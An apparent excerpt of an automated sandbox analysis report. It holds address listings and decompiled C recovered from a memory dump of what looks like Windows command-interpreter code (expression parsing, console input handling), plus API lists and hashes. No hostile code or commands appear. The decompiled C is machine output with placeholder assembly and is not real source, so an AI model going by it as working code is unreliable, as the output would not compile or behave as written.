                                              0x002bba25
                                              0x002bba26
                                              0x002bba26
                                              0x002bba26
                                              0x002bba28
                                              0x002ada46
                                              0x002ada46
                                              0x002ada49
                                              0x002ada4b
                                              0x002ada4d
                                              0x00000000
                                              0x00000000
                                              0x002ad9f1
                                              0x002ad9f4
                                              0x002ad9f6
                                              0x002ad9f9
                                              0x002ad9f9
                                              0x002ad9fc
                                              0x002ad9ff
                                              0x002ad9ff
                                              0x002ada04
                                              0x002ada06
                                              0x002ada08
                                              0x002ada0d
                                              0x002ada10
                                              0x002ada14
                                              0x002ada19
                                              0x002ada1c
                                              0x002ada1e
                                              0x002ada21
                                              0x002ada23
                                              0x002ada26
                                              0x002ada26
                                              0x002ada29
                                              0x002ada2c
                                              0x002ada2c
                                              0x002ada31
                                              0x002ada33
                                              0x002ada35
                                              0x002ada36
                                              0x002ada39
                                              0x002ada3b
                                              0x002ada40
                                              0x00000000
                                              0x00000000
                                              0x002ada40
                                              0x002ada39
                                              0x002ada1c
                                              0x002ada4f
                                              0x002ada55
                                              0x002ada5b
                                              0x002ada5e
                                              0x002bba31
                                              0x002bba36
                                              0x00000000
                                              0x002ada64
                                              0x002ada66
                                              0x002ada67
                                              0x002ada6c
                                              0x002ada72
                                              0x002ada74
                                              0x002adb8d
                                              0x002adb8d
                                              0x002adb8f
                                              0x002ada7a
                                              0x002ada7a
                                              0x002ada80
                                              0x002ada83
                                              0x002ada88
                                              0x002ada8b
                                              0x002ada8d
                                              0x002ada8d
                                              0x002ada90
                                              0x002ada92
                                              0x002ada98
                                              0x002ada98
                                              0x002ada9b
                                              0x002ada9b
                                              0x002ada9e
                                              0x00000000
                                              0x002adaa4
                                              0x002adaa6
                                              0x002adaac
                                              0x002adaad
                                              0x002adaaf
                                              0x002bba90
                                              0x002bba90
                                              0x00000000
                                              0x002adab5
                                              0x002adab7
                                              0x002adabd
                                              0x002adabe
                                              0x002adac1
                                              0x00000000
                                              0x002adac7
                                              0x002adac7
                                              0x002adac9
                                              0x002adace
                                              0x002adad0
                                              0x002bba41
                                              0x002bba43
                                              0x002bba48
                                              0x002bba4a
                                              0x00000000
                                              0x002bba50
                                              0x002bba56
                                              0x002bba5c
                                              0x002bba5e
                                              0x002bba64
                                              0x002bba66
                                              0x00000000
                                              0x002bba6c
                                              0x002bba6e
                                              0x002bba7e
                                              0x002bba83
                                              0x002bba84
                                              0x002bba86
                                              0x00000000
                                              0x002bba86
                                              0x002bba66
                                              0x002adad6
                                              0x002adad6
                                              0x002adad6
                                              0x002adad8
                                              0x002adadd
                                              0x002adae0
                                              0x002adae2
                                              0x002bbb26
                                              0x002bbb36
                                              0x002bbb3b
                                              0x002bbb3c
                                              0x002bbb3e
                                              0x002bbb43
                                              0x002bbb43
                                              0x002bbb48
                                              0x002bbb4b
                                              0x002bbb4e
                                              0x00000000
                                              0x002adae8
                                              0x002adae8
                                              0x002adaea
                                              0x002adaef
                                              0x002adaef
                                              0x002adaf2
                                              0x002adaf6
                                              0x002adb6d
                                              0x002adb6f
                                              0x002adb73
                                              0x002adb76
                                              0x002adb78
                                              0x002adb7c
                                              0x002adb7f
                                              0x002adb84
                                              0x002adb86
                                              0x00000000
                                              0x002adb88
                                              0x00000000
                                              0x002adb88
                                              0x002adaf8
                                              0x002adaf8
                                              0x002adafd
                                              0x002adafe
                                              0x002bba98
                                              0x002bba9d
                                              0x002bbaa2
                                              0x002bbaa8
                                              0x002bbaaa
                                              0x00000000
                                              0x002bbab0
                                              0x002bbab0
                                              0x002bbab5
                                              0x002bbaba
                                              0x002bbabc
                                              0x00000000
                                              0x002bbac2
                                              0x002bbac2
                                              0x002bbac5
                                              0x002bbac7
                                              0x002bbac9
                                              0x002bbac9
                                              0x002bbad9
                                              0x002bbadf
                                              0x002bbae1
                                              0x00000000
                                              0x002bbae7
                                              0x002bbae7
                                              0x002bbaea
                                              0x002bbaec
                                              0x002bbaee
                                              0x002bbaee
                                              0x002bbaf4
                                              0x002bbaf5
                                              0x00000000
                                              0x002bbaf5
                                              0x002bbae1
                                              0x002bbabc
                                              0x002adb04
                                              0x002adb07
                                              0x002adb09
                                              0x002adb0b
                                              0x002adb11
                                              0x002adb11
                                              0x002adb17
                                              0x002adb17
                                              0x002adb1c
                                              0x002adb22
                                              0x002adb24
                                              0x002bbb89
                                              0x002bbb89
                                              0x002bbb8e
                                              0x002bbb94
                                              0x00000000
                                              0x002adb2a
                                              0x002adb2a
                                              0x002adb2a
                                              0x002adb2c
                                              0x002bbaff
                                              0x002bbb01
                                              0x002bbb03
                                              0x002bbb08
                                              0x002bbb0e
                                              0x002bbb10
                                              0x002bbb15
                                              0x002bbb18
                                              0x002bbb58
                                              0x002bbb58
                                              0x002bbb5f
                                              0x002bbb7c
                                              0x00000000
                                              0x002bbb1a
                                              0x002bbb1a
                                              0x002bbb1c
                                              0x00000000
                                              0x002bbb1c
                                              0x002adb32
                                              0x002adb32
                                              0x002adb32
                                              0x002adb34
                                              0x00000000
                                              0x002adb3a
                                              0x002adb3a
                                              0x002adb40
                                              0x00000000
                                              0x002adb40
                                              0x002adb34
                                              0x002adb2c
                                              0x002adb24
                                              0x002adafe
                                              0x002adaf6
                                              0x002adae2
                                              0x002adad0
                                              0x002adac1
                                              0x002adaaf
                                              0x00000000
                                              0x002adb43
                                              0x002adb43
                                              0x002adb46
                                              0x002adb48
                                              0x002adb48
                                              0x002ada9b
                                              0x002ada92
                                              0x002ada74
                                              0x002adb50
                                              0x002adb53
                                              0x002adb59
                                              0x002adb5a
                                              0x002adb5d
                                              0x002adb5f
                                              0x002adb60
                                              0x002adb61
                                              0x002adb61
                                              0x002adb63
                                              0x002adb64
                                              0x002adb69
                                              0x002adb6b
                                              0x002adb6c
                                              0x00000000
                                              0x002adb6c
                                              0x002ad8f2
                                              0x002ad8f2
                                              0x002ad8f8
                                              0x002ad8fb
                                              0x002ad8fe
                                              0x002ad905
                                              0x002ad906
                                              0x002ad90b
                                              0x002ad90e
                                              0x002ad910
                                              0x002ad912
                                              0x002ad912
                                              0x00000000
                                              0x002ad910
                                              0x002ad8cc
                                              0x002ad8ce
                                              0x002ad8d0
                                              0x002ad8d0
                                              0x002ad8d2
                                              0x00000000
                                              0x002ad8d2
                                              0x002ad8ca
                                              0x002ad8ac
                                              0x002b0502
                                              0x002b050c
                                              0x002b0512
                                              0x002b0515
                                              0x002b0517
                                              0x00000000
                                              0x002b051d
                                              0x002b0527
                                              0x002b052d
                                              0x002b0530
                                              0x002b0532
                                              0x002b0551
                                              0x002b0551
                                              0x002ade5e
                                              0x002ade60
                                              0x002ade66
                                              0x002ade67
                                              0x002ade68
                                              0x002ade6a
                                              0x002bbca8
                                              0x002bbcaa
                                              0x002bbcac
                                              0x002bbcb2
                                              0x002bbcb2
                                              0x002ade72
                                              0x002ade78
                                              0x002ade7a
                                              0x002ade7c
                                              0x002bbcba
                                              0x002bbcbb
                                              0x002bbcc3
                                              0x002bbcc4
                                              0x002bbcca
                                              0x002bbccc
                                              0x002ade82
                                              0x002ade82
                                              0x002ade82
                                              0x002ade84
                                              0x002ade84
                                              0x002ade8b
                                              0x002ade8c
                                              0x002ade91
                                              0x002ade93
                                              0x002bbcd7
                                              0x002bbcdb
                                              0x00000000
                                              0x002ade99
                                              0x002ade9b
                                              0x002ade9d
                                              0x002ade9f
                                              0x002adea4
                                              0x002adea9
                                              0x002adeab
                                              0x002adee6
                                              0x002adee6
                                              0x002adee7
                                              0x002adee9
                                              0x002adeea
                                              0x002adeeb
                                              0x002adead
                                              0x002adeaf
                                              0x002adeb0
                                              0x002adeb5
                                              0x002adeba
                                              0x002adeee
                                              0x002adef0
                                              0x002adef2
                                              0x00000000
                                              0x002adebc
                                              0x002adebc
                                              0x002adec1
                                              0x002adec4
                                              0x002adec9
                                              0x002adecb
                                              0x002bbce6
                                              0x002bbcf2
                                              0x002bbcf8
                                              0x002bbcf9
                                              0x002bbcfb
                                              0x002bbd01
                                              0x002bbd03
                                              0x002bbd03
                                              0x002adfb0
                                              0x002adfb1
                                              0x002adfb2
                                              0x002adfb4
                                              0x002adfb5
                                              0x002aded1
                                              0x002aded1
                                              0x002aded7
                                              0x002adede
                                              0x002adee1
                                              0x00000000
                                              0x002adee1
                                              0x002adecb
                                              0x002adeba
                                              0x002adeab
                                              0x002b0534
                                              0x002b053e
                                              0x002b0544
                                              0x002b0547
                                              0x002b0549
                                              0x00000000
                                              0x002b054b
                                              0x002b054b
                                              0x002aed82
                                              0x002aed83
                                              0x002aed85
                                              0x002aed88
                                              0x002aed89
                                              0x002aed8a
                                              0x002aed8d
                                              0x002aed94
                                              0x002aed95
                                              0x002aed95
                                              0x002aed97
                                              0x002aed9f
                                              0x002aeda1
                                              0x002aeda4
                                              0x002aeda4
                                              0x002aeda9
                                              0x002aedab
                                              0x00000000
                                              0x00000000
                                              0x002aedad
                                              0x002aedb2
                                              0x002aedb7
                                              0x002aedbc
                                              0x002aede9
                                              0x002aedec
                                              0x002aedf2
                                              0x002aedf4
                                              0x002bc0ad
                                              0x002bc0b0
                                              0x002bc0b0
                                              0x002bc0b3
                                              0x002bc0b6
                                              0x002bc0b6
                                              0x002bc0bb
                                              0x002bc0bf
                                              0x002bc0bf
                                              0x002aedfa
                                              0x002aee02
                                              0x002aee04
                                              0x002aee07
                                              0x002aee09
                                              0x002bc0f7
                                              0x002bc103
                                              0x002bc109
                                              0x002bc10a
                                              0x002bc111
                                              0x002bc117
                                              0x002bc117
                                              0x002aefe1
                                              0x002aefe1
                                              0x002aefe3
                                              0x002aefea
                                              0x002aefef
                                              0x002bc121
                                              0x002bc123
                                              0x002bc125
                                              0x002bc125
                                              0x002aeff5
                                              0x002aeff7
                                              0x002aeff8
                                              0x002aeff9
                                              0x002aeffa
                                              0x002aeffb
                                              0x002aee0f
                                              0x002aee0f
                                              0x002aee12
                                              0x002aee14
                                              0x002bc0c7
                                              0x002bc0c9
                                              0x002bc0cb
                                              0x002bc0cb
                                              0x002aee1a
                                              0x002aee1c
                                              0x002aee1e
                                              0x002bc0d5
                                              0x002bc0d5
                                              0x002aee24
                                              0x002aee24
                                              0x002aee2a
                                              0x00000000
                                              0x00000000
                                              0x002aee2a
                                              0x002aee30
                                              0x002aee32
                                              0x002bc0f0
                                              0x002bc0f0
                                              0x002aee38
                                              0x002aee38
                                              0x002aee3a
                                              0x002aee3c
                                              0x002aee3e
                                              0x002aee40
                                              0x002bc0eb
                                              0x002bc0eb
                                              0x00000000
                                              0x002aee46
                                              0x002aee46
                                              0x002aee46
                                              0x002aee49
                                              0x00000000
                                              0x00000000
                                              0x002bc0df
                                              0x002bc0e2
                                              0x002bc0e2
                                              0x002bc0e5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bc0e5
                                              0x002aee4f
                                              0x002aee51
                                              0x00000000
                                              0x002aee57
                                              0x002aee57
                                              0x002aee59
                                              0x002aee59
                                              0x002aee59
                                              0x002aee51
                                              0x002aee40
                                              0x002aee5b
                                              0x002aee5b
                                              0x002aee5d
                                              0x002aee5f
                                              0x002aee62
                                              0x002aee64
                                              0x002aee67
                                              0x002aee67
                                              0x002aee69
                                              0x002aee99
                                              0x002aee99
                                              0x002aee6b
                                              0x002aee6b
                                              0x002aee6d
                                              0x002aee73
                                              0x002aee75
                                              0x002aee7a
                                              0x002aee7c
                                              0x002aee7c
                                              0x002aee80
                                              0x002aee80
                                              0x002aee82
                                              0x00000000
                                              0x00000000
                                              0x002aee84
                                              0x002aee88
                                              0x002aee8b
                                              0x00000000
                                              0x002aee8d
                                              0x002aee8d
                                              0x002aee90
                                              0x002aee91
                                              0x002aee94
                                              0x002aee94
                                              0x002aee97
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aee97
                                              0x00000000
                                              0x002aee8b
                                              0x002aee9e
                                              0x002aeea0
                                              0x00000000
                                              0x00000000
                                              0x002aeea0
                                              0x002aeea2
                                              0x002aeea2
                                              0x002aeea5
                                              0x002aeea5
                                              0x002aeea7
                                              0x002aeea7
                                              0x002aeeaa
                                              0x00000000
                                              0x002aeeaa
                                              0x002aedbe
                                              0x002aedbe
                                              0x002aedc1
                                              0x002aedc3
                                              0x002aedc8
                                              0x002aedca
                                              0x002aeeb2
                                              0x002aeeb4
                                              0x002aeeb4
                                              0x002aeeb4
                                              0x002aeeb7
                                              0x002aeeb9
                                              0x002aeebc
                                              0x002aeebc
                                              0x002aeec0
                                              0x00000000
                                              0x002aedd0
                                              0x002aedd1
                                              0x002aedd3
                                              0x002aedd3
                                              0x002aedd5
                                              0x00000000
                                              0x002aedd5
                                              0x002aedca
                                              0x00000000
                                              0x002aedbc
                                              0x002aedda
                                              0x002aeddd
                                              0x002aedde
                                              0x002aede1
                                              0x002aede3
                                              0x002aede4
                                              0x002aede5
                                              0x002aede7
                                              0x002aede8
                                              0x002aede8
                                              0x002b0549
                                              0x002b0532
                                              0x002b0517
                                              0x002b04fc
                                              0x002b04e1
                                              0x002b04c6
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp
                                              • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                              • API String ID: 2081463915-3874590324
                                              • Opcode ID: 0b527774f72ccfaf365d12f9a9c58d13dfbfa79c1af60afd63883bc0317339b1
                                              • Instruction ID: c902e346f59d618b967cfa5092324f51db95c6795a334f856f77bec423726e35
                                              • Opcode Fuzzy Hash: 0b527774f72ccfaf365d12f9a9c58d13dfbfa79c1af60afd63883bc0317339b1
                                              • Instruction Fuzzy Hash: 2731093067421287DF712F68BD997A73380AB02781F888037E54B946D1DEA0D9B5CB69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A64DC, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 29%
                                              			E002A64DC(void* __eflags, char _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E002A9794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					_t9 =  &_a4; // 0x2a6463
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return  *_t9;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E002A6355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E002A9794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E002A64DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E002A4409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					_t11 =  &_v12; // 0x2a6463
					__eflags = E002A6785( &_a8, _t11, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E002A60DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}













                                              0x002a64ea
                                              0x002a64ef
                                              0x002a64f2
                                              0x002a64f8
                                              0x002bac90
                                              0x002bac90
                                              0x002a6589
                                              0x002a658c
                                              0x002a658c
                                              0x002a6591
                                              0x002a6592
                                              0x002a6593
                                              0x002a659a
                                              0x002a659a
                                              0x002a6501
                                              0x002a65cf
                                              0x002a65d5
                                              0x002a65d6
                                              0x002a65d7
                                              0x002a65d8
                                              0x002a65d9
                                              0x002a65e3
                                              0x002a65e4
                                              0x002a65e5
                                              0x002a65e6
                                              0x002a65ea
                                              0x002a665c
                                              0x00000000
                                              0x002a665c
                                              0x002a65ef
                                              0x002a65f4
                                              0x002a65f7
                                              0x002a65fb
                                              0x002bac9c
                                              0x002a6601
                                              0x002a6604
                                              0x002a6604
                                              0x00000000
                                              0x002a65fb
                                              0x002a6517
                                              0x002a6624
                                              0x002a6633
                                              0x002a6634
                                              0x002a6635
                                              0x002a6636
                                              0x002a6637
                                              0x002a6641
                                              0x002a6642
                                              0x002a6643
                                              0x002a6644
                                              0x002a6648
                                              0x00000000
                                              0x00000000
                                              0x002a6652
                                              0x00000000
                                              0x002a6652
                                              0x002a651e
                                              0x002a6527
                                              0x002a65a1
                                              0x002a65ac
                                              0x002a65ae
                                              0x00000000
                                              0x002a65b4
                                              0x002a65bf
                                              0x00000000
                                              0x002a65bf
                                              0x002a65ae
                                              0x002a6529
                                              0x002a6531
                                              0x002a6533
                                              0x002a653a
                                              0x002a6609
                                              0x002a660d
                                              0x002a6610
                                              0x002baca8
                                              0x002bacae
                                              0x002a654c
                                              0x002a654f
                                              0x002a6557
                                              0x002bacb9
                                              0x002bacbf
                                              0x002bacc2
                                              0x00000000
                                              0x00000000
                                              0x002bacc8
                                              0x00000000
                                              0x002bacc8
                                              0x002a655d
                                              0x002a656d
                                              0x002bacd4
                                              0x002bacd4
                                              0x00000000
                                              0x002a656d
                                              0x002a6616
                                              0x002a6619
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a661f
                                              0x002a6540
                                              0x002a6546
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                              • String ID: +-~!$cd*$cd*
                                              • API String ID: 2191331888-1122579162
                                              • Opcode ID: 067417114a3ecd6db48e1c7a25114f2817d50ea7b201837e8b075243626fcf6b
                                              • Instruction ID: 716b70fd52ec303c45e7410b2005d6197fdd421d611f7ba14c01594aade36fe5
                                              • Opcode Fuzzy Hash: 067417114a3ecd6db48e1c7a25114f2817d50ea7b201837e8b075243626fcf6b
                                              • Instruction Fuzzy Hash: 2951947182020AEFCB11DF54E8485EB37A5EF06360F548156FC159F180EB74DE64DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C474C, Relevance: 18.2, APIs: 12, Instructions: 203COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E002C474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E002ADF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E002B2430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E002B2430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E002B2430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E002B2430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E002AC108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E002C3B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E002B711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0x2cd5fc == 2) {
											_t63 = E002C46A5(_t89, 0);
											L35:
											 *0x2db8b0 = _t63;
											return _t63;
										}
										_t63 = E002C46A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E002B3A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E002B6FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E002AC5A2(_t82);
						goto L3;
					}
				}
			}






































                                              0x002c474c
                                              0x002c4757
                                              0x002c475e
                                              0x002c4761
                                              0x002c4762
                                              0x002c4765
                                              0x002c4766
                                              0x002c476c
                                              0x002c4772
                                              0x002c4779
                                              0x002c4799
                                              0x002c479b
                                              0x00000000
                                              0x002c477b
                                              0x002c477b
                                              0x002c4782
                                              0x002c4784
                                              0x002c478a
                                              0x002c47af
                                              0x002c47b3
                                              0x002c47b5
                                              0x002c47bd
                                              0x002c47c1
                                              0x002c47cb
                                              0x002c47cf
                                              0x002c47cf
                                              0x002c47cb
                                              0x002c47d4
                                              0x002c47d7
                                              0x002c47de
                                              0x002c47e1
                                              0x00000000
                                              0x002c47e3
                                              0x002c47e5
                                              0x002c47e8
                                              0x002c47e8
                                              0x002c47f0
                                              0x002c47f4
                                              0x002c47f8
                                              0x002c47fa
                                              0x002c47fd
                                              0x002c4804
                                              0x002c4806
                                              0x002c4809
                                              0x002c4810
                                              0x002c4813
                                              0x002c4815
                                              0x002c4817
                                              0x002c4817
                                              0x002c4813
                                              0x002c481c
                                              0x002c4820
                                              0x00000000
                                              0x002c4826
                                              0x002c482e
                                              0x002c4840
                                              0x002c484b
                                              0x002c4854
                                              0x002c4854
                                              0x002c485c
                                              0x002c4862
                                              0x002c4868
                                              0x002c4878
                                              0x002c4880
                                              0x002c4883
                                              0x002c4891
                                              0x002c4891
                                              0x002c489f
                                              0x002c48a9
                                              0x002c48be
                                              0x002c48c4
                                              0x002c48ca
                                              0x002c48d3
                                              0x002c48fc
                                              0x002c48fc
                                              0x002c48fe
                                              0x002c48d5
                                              0x002c48d5
                                              0x002c48dd
                                              0x00000000
                                              0x002c48df
                                              0x002c48df
                                              0x002c48e6
                                              0x002c48ec
                                              0x002c48ed
                                              0x002c48f0
                                              0x002c48f8
                                              0x00000000
                                              0x00000000
                                              0x002c48fa
                                              0x00000000
                                              0x002c48f8
                                              0x002c48e6
                                              0x002c48dd
                                              0x002c4904
                                              0x002c490b
                                              0x002c4914
                                              0x002c491a
                                              0x002c491a
                                              0x002c4927
                                              0x002c4935
                                              0x002c493b
                                              0x002c493b
                                              0x002c4943
                                              0x00000000
                                              0x002c4949
                                              0x002c4949
                                              0x002c4950
                                              0x002c496e
                                              0x002c4973
                                              0x002c4974
                                              0x002c4975
                                              0x002c4976
                                              0x002c4977
                                              0x002c4978
                                              0x002c4979
                                              0x002c497a
                                              0x002c497b
                                              0x002c497c
                                              0x002c497d
                                              0x002c497e
                                              0x002c497f
                                              0x002c4982
                                              0x002c4985
                                              0x002c4991
                                              0x002c499e
                                              0x002c49a3
                                              0x002c49a3
                                              0x00000000
                                              0x002c49a3
                                              0x002c4993
                                              0x002c499a
                                              0x00000000
                                              0x002c499c
                                              0x002c49a9
                                              0x002c4952
                                              0x002c4954
                                              0x002c495a
                                              0x002c4964
                                              0x002c479c
                                              0x002c479f
                                              0x002c47a0
                                              0x002c47a3
                                              0x002c47ac
                                              0x002c47ac
                                              0x002c4950
                                              0x002c4943
                                              0x002c4820
                                              0x002c478c
                                              0x002c478c
                                              0x002c478c
                                              0x002c478d
                                              0x002c4792
                                              0x00000000
                                              0x002c4798
                                              0x002c478a

                                              APIs
                                                • Part of subcall function 002B2430: iswspace.MSVCRT ref: 002B2440
                                              • wcsrchr.MSVCRT ref: 002C47C1
                                              • wcschr.MSVCRT ref: 002C47D7
                                              • wcsrchr.MSVCRT ref: 002C4809
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 002C4828
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C4838
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C4854
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 002C485C
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C4870
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 002C4891
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 002C48BE
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C4914
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 002C4935
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                              • String ID:
                                              • API String ID: 4166807220-0
                                              • Opcode ID: f2d4c6aeeeef77e3ae0c8f5734a5200b38f546cde92ff6e28f8c3bb4f78d61c0
                                              • Instruction ID: 97e733613ab524af098ccf702a2ceecaaaf860ac319c303703f2c269ee980400
                                              • Opcode Fuzzy Hash: f2d4c6aeeeef77e3ae0c8f5734a5200b38f546cde92ff6e28f8c3bb4f78d61c0
